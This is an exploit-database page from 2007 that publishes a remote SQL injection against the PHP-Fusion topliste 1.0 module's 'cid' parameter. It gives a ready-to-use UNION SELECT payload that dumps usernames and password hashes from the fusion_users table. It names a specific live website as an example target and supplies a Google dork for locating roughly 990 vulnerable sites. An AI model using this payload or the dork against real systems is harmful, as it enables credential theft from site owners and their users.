[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : PHP-Fusion Module topliste 1.0 (cid) Remote SQL Injection Vulnerability
# Published : 2007-04-02
# Author : xoron
# Previous Title : MapLab MS4W 2.2.1 Remote File Inclusion Vulnerability
# Next Title : Expow 0.8 (autoindex.php cfg_file) Remote File Inclusion Vulnerability
--------------------------------
PHP-FUSION topliste Module (cid) Remote SQL Injection Vuln
--------------------------------
Bulan: xoron - unique
xoron.biz
--------------------------------
Exploit:
index.php?cid=-1/**/UNION/**/SELECT/**/0,1,2,3,user_name,user_password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/**/FROM/**/fusion_users/*
--------------------------------
Exapmle: http://www.321spil.dk/infusions/topliste/
--------------------------------
Google Dork:
infusions/topliste/ 990 sites:)
--------------------------------
Ekin0x / --> evilc0der.org <--
--------------------------------
# www.Syue.com [2007-04-02]